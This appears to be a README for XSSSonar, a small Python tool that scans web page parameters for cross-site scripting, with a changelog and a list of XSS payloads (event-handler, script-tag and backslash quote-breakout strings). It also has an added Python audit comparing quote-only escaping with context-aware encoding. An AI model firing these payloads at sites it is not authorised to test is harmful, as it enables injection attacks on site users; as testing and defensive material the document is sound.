luigigubello/XSSSonar

XSSSonar

Little tool to look for XSS vulnerabilities in a web page.

Info

This code is just a draft. There are some errors still to be corrected, and sometimes false positives occur.
Tested with Python 2.7.9 on Debian Jessie. I'll maybe write it for Python 3.x.

ChangeLog

0.1.6
[-] Fixed some bugs
[-] Added scan on list of POST parameters
[-] Added option to assign default value to a POST parameter
[-] Added help function

0.1.5a
[-] Fixed some bugs
[-] Less than 400 lines of code

0.1.5
[-] Added scan on POST parameters
[-] Changed name

0.1.4a
[-] Added stopwatch to know the time spent to check each URL
[-] Same features with 1500 fewer lines of code

0.1.4
[-] Check a single URL or a list.txt of sites

List of XSS Payloads

'">"'><img src=x onerror=confirm`XSS`>
"> <script>alert`XSS`</script>
'">"'><svg onload=confirm`XSS`>
"',;</script><script>confirm`XSS`</script>
'><svg onload=confirm`XSS`>
"><svg/onload=confirm`XSS`//
"><details/open/ontoggle=confirm`XSS`>
" onfocus="confirm`XSS`" autofocus=""
" onclick="confirm`XSS`"
" onmouseover="confirm`XSS`"
\"-confirm`XSS`//
\'-confirm`XSS`//
"-confirm`XSS`-"'-confirm`XSS`-'
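
Seen from the defender's side, the list mixes tag, attribute and backslash-prefixed payloads because each targets a different output context. The following is an added example, not part of XSSSonar: it runs six of the payloads above through a quote-only escaper and through context-appropriate encoders, and reports which outputs still let the string be terminated. The function names and the breakout check are assumptions made for illustration (Python 3).

```python
import html
import json

# Six payloads copied verbatim from the list above, one per line.
PAYLOADS = r'''
"> <script>alert`XSS`</script>
"',;</script><script>confirm`XSS`</script>
" onfocus="confirm`XSS`" autofocus=""
\"-confirm`XSS`//
\'-confirm`XSS`//
"-confirm`XSS`-"'-confirm`XSS`-'
'''.strip().splitlines()

def naive_js_escape(value):
    # Flawed "before": escapes quotes but forgets the backslash itself.
    return value.replace('"', '\\"').replace("'", "\\'")

def js_string_literal(value):
    # JSON-encode, then hide <, > and & so "</script>" cannot end the block.
    out = json.dumps(value)
    for ch in "<>&":
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out

def html_attr_escape(value):
    # For values placed inside a quoted HTML attribute or element body.
    return html.escape(value, quote=True)

def breaks_out(body, quote):
    # True if an unescaped quote character ends the JS string early.
    i = 0
    while i < len(body):
        if body[i] == "\\":
            i += 2          # a backslash consumes the next character
        elif body[i] == quote:
            return True
        else:
            i += 1
    return False

def audit(payloads=PAYLOADS):
    rows = []
    for p in payloads:
        naive, safe = naive_js_escape(p), js_string_literal(p)[1:-1]
        rows.append({
            "payload": p,
            "naive_breakout": any(breaks_out(naive, q) for q in "\"'")
                              or "</script" in naive.lower(),
            "json_breakout": breaks_out(safe, '"') or "</script" in safe.lower(),
            "attr_safe": not any(c in html_attr_escape(p) for c in "<>\"'"),
        })
    return rows

if __name__ == "__main__":
    for row in audit():
        print(row)
```

The two backslash-prefixed payloads defeat quote-only escaping because the injected backslash escapes the escaper's own backslash, leaving the quote live.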

To start

pip install fake-useragent
python xsssonar.py
